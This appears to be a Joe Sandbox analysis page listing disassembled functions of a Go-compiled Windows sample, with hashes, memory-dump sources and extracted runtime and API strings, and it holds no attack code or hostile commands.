                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: but progSize nmidlelocked= on zero Value out of range procedure in to finalizer untyped args -thread limit/log/filter.go/log/helper.go1907348632812595367431640625: extra text: Align 16-BytesAlign 32-BytesAlign 64-BytesBstrFromVectorCET CompatibleCertClos$+$heapBitsSetTypeGCProg: unexpected bit countinterrupted system call should be restartedmethodValueCallFrameObjs is not in a modulemult64bitPow10: power of 10 is out of rangemultiple Read calls return no data or errornon in-use span found with specials bit setof$runtime: heapBitsSetTypeGCProg: total bits runtime: releaseSudog with non-nil gp.paramruntime:stoplockedm: lockedg (atomicstatus=transform: inconsistent byte count returnedunfinished open-coded defers in deferreturnunknown runnable goroutine during bootstrapx5
                                                                                • API String ID: 0-2138322421
                                                                                • Opcode ID: 7f81556d8fcef66b69d6c1e15444444d9d6b286359a7da0ff032ad38d62891af
                                                                                • Instruction ID: 6579c99f8b07f831653d32956352bcb190318087400d29925a77599501251079
                                                                                • Opcode Fuzzy Hash: 7f81556d8fcef66b69d6c1e15444444d9d6b286359a7da0ff032ad38d62891af
                                                                                • Instruction Fuzzy Hash: EF715F747093418BC718EF68C59572EB7E2AB89304F56892EE48687382DB35CC49CBD3
                                                                                Function 00AB9780 Relevance: 5.2, Strings: 4, Instructions: 185COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • 1, xrefs: 00AB99D0
                                                                                • notetsleep - waitm out of syncprotocol wrong type for socket : Elem of invalid type : Len of non-array type : Out of non-func type rich header parsing failed: %vrunqputslow: queue is not fullruntime: bad g in cgocallbackruntime: bad pointer, xrefs: 00AB9835
                                                                                • runtime: unexpected waitm - semaphore out of syncs.allocCount != s.nelems && freeIndex == s.nelemsslice bounds out of range [::%x] with capacity %ystrings.Reader.UnreadByte: at beginning of stringstrings.Reader.WriteTo: invalid WriteString countsweeper left ou, xrefs: 00AB99C7
                                                                                • runtime: unable to acquire - semaphore out of syncunhandled metadata table %d %s offset 0x%x cols %dx509: RSA public exponent is not a positive numberx509: invalid RDNSequence: invalid attribute valuex509: missing ASN.1 contents; use ParseCertificateExport dir, xrefs: 00AB99B1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 1$notetsleep - waitm out of syncprotocol wrong type for socket : Elem of invalid type : Len of non-array type : Out of non-func type rich header parsing failed: %vrunqputslow: queue is not fullruntime: bad g in cgocallbackruntime: bad pointer$runtime: unable to acquire - semaphore out of syncunhandled metadata table %d %s offset 0x%x cols %dx509: RSA public exponent is not a positive numberx509: invalid RDNSequence: invalid attribute valuex509: missing ASN.1 contents; use ParseCertificateExport dir$runtime: unexpected waitm - semaphore out of syncs.allocCount != s.nelems && freeIndex == s.nelemsslice bounds out of range [::%x] with capacity %ystrings.Reader.UnreadByte: at beginning of stringstrings.Reader.WriteTo: invalid WriteString countsweeper left ou
                                                                                • API String ID: 0-4093100599
                                                                                • Opcode ID: fdf9f3dadf14b9f26911cb5e6001698d64350f876b91d15c4fd34bfa2ef1e096
                                                                                • Instruction ID: a9a99811b51fbec45cd75a733b71fda0b948eb3b74aa2ab971b927a27a4eaa87
                                                                                • Opcode Fuzzy Hash: fdf9f3dadf14b9f26911cb5e6001698d64350f876b91d15c4fd34bfa2ef1e096
                                                                                • Instruction Fuzzy Hash: D3718AB46093518FD354DF69C580B5BBBE0BF88704F05896CE8E89B3A2D771D844CBA2
                                                                                Function 00AD4D10 Relevance: 5.2, Strings: 4, Instructions: 181COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • runtime: out of memory: cannot allocate runtime: typeBitsBulkBarrier with type ryuFtoaFixed32 called with negative prectoo many invalid names, aborting parsingx509: cannot parse IP address of length x509: malformed extension critical field34694469519536141888, xrefs: 00AD4EB5
                                                                                • in use) lockedg= lockedm= m->curg= marked method: ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=%!(EXTRA %s %q: %s(MISSING)(unknown)*invalid*, Offset=, newval=, oldval=, size = , tail = -07:00:00244140625: status=Authorit, xrefs: 00AD4F09
                                                                                • (, xrefs: 00AD4EBE
                                                                                • -byte block (3814697265625Align 2-BytesAlign 4-BytesAlign 8-BytesAssemblyRefOSBSTR_UserFreeBSTR_UserSizeCertOpenStoreClearCustDataCoTaskMemFreeCreateTypeLibDeleteServiceEFI ROM imageEFI byte codeEnumProcessesExitWindowsExFindFirstFileFindNextFileWFindResourceW, xrefs: 00AD4EDF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: in use) lockedg= lockedm= m->curg= marked method: ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=%!(EXTRA %s %q: %s(MISSING)(unknown)*invalid*, Offset=, newval=, oldval=, size = , tail = -07:00:00244140625: status=Authorit$($-byte block (3814697265625Align 2-BytesAlign 4-BytesAlign 8-BytesAssemblyRefOSBSTR_UserFreeBSTR_UserSizeCertOpenStoreClearCustDataCoTaskMemFreeCreateTypeLibDeleteServiceEFI ROM imageEFI byte codeEnumProcessesExitWindowsExFindFirstFileFindNextFileWFindResourceW$runtime: out of memory: cannot allocate runtime: typeBitsBulkBarrier with type ryuFtoaFixed32 called with negative prectoo many invalid names, aborting parsingx509: cannot parse IP address of length x509: malformed extension critical field34694469519536141888
                                                                                • API String ID: 0-4013262594
                                                                                • Opcode ID: 7b0fd05fd4612dccb0f51e8758f24490980430a8bddb7d644d23fb6e001369e6
                                                                                • Instruction ID: 8c75dfe3b3097c96be3d2e6490019aaf6e7f4a55992b7e44957ad0834795134c
                                                                                • Opcode Fuzzy Hash: 7b0fd05fd4612dccb0f51e8758f24490980430a8bddb7d644d23fb6e001369e6
                                                                                • Instruction Fuzzy Hash: 1181E2B49097059FC300EF69D58069EBBF0FF88744F44892EE8898B312E775D849CB52
                                                                                Function 00AE9EB0 Relevance: 5.2, Strings: 4, Instructions: 166COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • startm: m is spinningstate not recoverabletimer data corruptiontrace/breakpoint trapunexpected value stepuser defined signal 1user defined signal 2x509: invalid version%SystemRoot%\system32\/lib/time/zoneinfo.zip4656612873077392578125Aleutian Standard TimeAtla, xrefs: 00AEA114
                                                                                • startm: negative nmspinningstopTheWorld: holding lockstime: invalid location nametimer when must be positivetoo many callback functionsunsupported string type: %vwork.nwait was > work.nprocx509: malformed certificate args stack map entries for 1818989403545856, xrefs: 00AEA0D2
                                                                                • startm: m has pstopm holding punknown Go type already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625: value of type AddDllDirectory, xrefs: 00AEA0FE
                                                                                • startm: p has runnable gsstoplockedm: not runnableunexpected '[' in addressunexpected ']' in addressunexpected fault address unexpected key value typeunknown Go type for slicex509: invalid RDNSequencex509: invalid RSA modulusx509: malformed extensionx509: malf, xrefs: 00AEA0E8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: startm: m has pstopm holding punknown Go type already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625: value of type AddDllDirectory$startm: m is spinningstate not recoverabletimer data corruptiontrace/breakpoint trapunexpected value stepuser defined signal 1user defined signal 2x509: invalid version%SystemRoot%\system32\/lib/time/zoneinfo.zip4656612873077392578125Aleutian Standard TimeAtla$startm: negative nmspinningstopTheWorld: holding lockstime: invalid location nametimer when must be positivetoo many callback functionsunsupported string type: %vwork.nwait was > work.nprocx509: malformed certificate args stack map entries for 1818989403545856$startm: p has runnable gsstoplockedm: not runnableunexpected '[' in addressunexpected ']' in addressunexpected fault address unexpected key value typeunknown Go type for slicex509: invalid RDNSequencex509: invalid RSA modulusx509: malformed extensionx509: malf
                                                                                • API String ID: 0-3722663094
                                                                                • Opcode ID: 16363d221a4c84b7f746662edcf3d2e3629e971b62cc721d8f5a25425ad6b850
                                                                                • Instruction ID: 32611d9d036defcb36bccc9f3daf7fea91e481aa0be8921e630a38b537f11111
                                                                                • Opcode Fuzzy Hash: 16363d221a4c84b7f746662edcf3d2e3629e971b62cc721d8f5a25425ad6b850
                                                                                • Instruction Fuzzy Hash: 1E6169B45083848FC714DF25C194B6ABBE0FF99704F0489ADE8998B362D335E989DF52
                                                                                Function 00ADB720 Relevance: 5.1, Strings: 4, Instructions: 149COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $ $ $
                                                                                • API String ID: 0-3535155489
                                                                                • Opcode ID: 38b74be8d341230c14d5fa5e1864e5ad426e7d10a718156ff98887734e68f1b5
                                                                                • Instruction ID: 1ccf7750c97351d289ff00ce3794f69992cc4ab5dd73ba6798d8e66f81b17c3b
                                                                                • Opcode Fuzzy Hash: 38b74be8d341230c14d5fa5e1864e5ad426e7d10a718156ff98887734e68f1b5
                                                                                • Instruction Fuzzy Hash: 8571D074509781CFC324DF28C194B5ABBE2BFC9314F158A2EE49A9B391DB34D845CB92
                                                                                Function 00AB3620 Relevance: 5.1, Strings: 4, Instructions: 148COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • &, xrefs: 00AB384F
                                                                                • runtime: bad g in cgocallbackruntime: bad pointer in frame runtime: found in object at *(runtime: impossible type kind socket operation on non-socketsync: inconsistent mutex statesync: unlock of unlocked mutextransform: short source bufferx509: SAN dNSName is, xrefs: 00AB3721
                                                                                • cgocall nilclobberfreeclosesocketcreated by crypt32.dllfile existsfinal tokenfloat32nan2float64nan1float64nan2float64nan3gccheckmarkgeneralizedgetaddrinfogethostnamegetnameinfogetpeernamegetsocknamei/o timeoutioctlsocketmSpanManualmethodargs(mswsock.dllnetpoll, xrefs: 00AB36E4
                                                                                • m changed unexpectedly in cgocallbackgmakechan: invalid channel element typeruntime: blocked read on free polldescruntime: sudog with non-false isSelectstrings.Reader.ReadAt: negative offsetstrings.Reader.Seek: negative positiontime: missing Location in call t, xrefs: 00AB3846
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: &$cgocall nilclobberfreeclosesocketcreated by crypt32.dllfile existsfinal tokenfloat32nan2float64nan1float64nan2float64nan3gccheckmarkgeneralizedgetaddrinfogethostnamegetnameinfogetpeernamegetsocknamei/o timeoutioctlsocketmSpanManualmethodargs(mswsock.dllnetpoll$m changed unexpectedly in cgocallbackgmakechan: invalid channel element typeruntime: blocked read on free polldescruntime: sudog with non-false isSelectstrings.Reader.ReadAt: negative offsetstrings.Reader.Seek: negative positiontime: missing Location in call t$runtime: bad g in cgocallbackruntime: bad pointer in frame runtime: found in object at *(runtime: impossible type kind socket operation on non-socketsync: inconsistent mutex statesync: unlock of unlocked mutextransform: short source bufferx509: SAN dNSName is
                                                                                • API String ID: 0-1219494809
                                                                                • Opcode ID: db10149a72225d70a38422b372ac17b9cf804a08b2a6084c9c72933bf468a360
                                                                                • Instruction ID: 3af1baf3689085d434df95dc978573aae40be43fdbe4f39c7c0e9e8e0869a8c1
                                                                                • Opcode Fuzzy Hash: db10149a72225d70a38422b372ac17b9cf804a08b2a6084c9c72933bf468a360
                                                                                • Instruction Fuzzy Hash: 8061C5B46093409FC704DF64C194BAABBE1FF89304F5588ADE8898B362D775E845CF52
                                                                                Function 00AD1780 Relevance: 5.1, Strings: 4, Instructions: 148COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>%!(BADWIDTH)) p->status=, cons/mark -byte limit152587890625762939453125Align 1-ByteArchitectureBidi_ControlCfgMgr32.dllCoCreateGuidCreateEventWCreateMutexWDeclSecurityDispCallFuncDispGetP, xrefs: 00AD1964
                                                                                • non in-use span in unswept listpacer: sweep done at heap size pattern contains path separatorpkcs7: unsupported algorithm %q : negative cap : negative len : Len of non-array type : NumIn of non-func typeresetspinnin, xrefs: 00AD19C2
                                                                                • sweepgen= targetpc= throwing= until pc=%!(NOVERB)%!Weekday((BADINDEX), bound = , limit = /dev/stdin012345678912207031256103515625AdditionalAssemblyOSBad varintC:\WindowsCancelIoExChorasmianClassCHAOSClassCSNETCreateFileCreatePipeDSA-SHA256DeprecatedDevanagari, xrefs: 00AD198E
                                                                                • runtime: bad span s.state=runtime: pcHeader: magic= segment prefix is reservedshrinking stack in libcallstartlockedm: locked to metoo many colons in addresstruncated base 128 integeruse of invalid sweepLockerx509: invalid simple chainx509: malformed extensions, xrefs: 00AD1936
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>%!(BADWIDTH)) p->status=, cons/mark -byte limit152587890625762939453125Align 1-ByteArchitectureBidi_ControlCfgMgr32.dllCoCreateGuidCreateEventWCreateMutexWDeclSecurityDispCallFuncDispGetP$ sweepgen= targetpc= throwing= until pc=%!(NOVERB)%!Weekday((BADINDEX), bound = , limit = /dev/stdin012345678912207031256103515625AdditionalAssemblyOSBad varintC:\WindowsCancelIoExChorasmianClassCHAOSClassCSNETCreateFileCreatePipeDSA-SHA256DeprecatedDevanagari$non in-use span in unswept listpacer: sweep done at heap size pattern contains path separatorpkcs7: unsupported algorithm %q : negative cap : negative len : Len of non-array type : NumIn of non-func typeresetspinnin$runtime: bad span s.state=runtime: pcHeader: magic= segment prefix is reservedshrinking stack in libcallstartlockedm: locked to metoo many colons in addresstruncated base 128 integeruse of invalid sweepLockerx509: invalid simple chainx509: malformed extensions
                                                                                • API String ID: 0-1656947467
                                                                                • Opcode ID: 6a2c4b3e0e5c30f2261ea1a584810447f8d9ef82cb4a5cdc44c716ab7dfe1e69
                                                                                • Instruction ID: 444c1e1802eac484b0b4e831a9d4a724d2c6ac8487deceac3cb5c5d52292c3ae
                                                                                • Opcode Fuzzy Hash: 6a2c4b3e0e5c30f2261ea1a584810447f8d9ef82cb4a5cdc44c716ab7dfe1e69
                                                                                • Instruction Fuzzy Hash: C16152B4508385AFC300EF65D1A0A6EBBE0AF89304F40496EF8C987362E734D948DF52
                                                                                Function 00AE5D70 Relevance: 5.1, Strings: 4, Instructions: 129COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • <=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06, xrefs: 00AE5F00
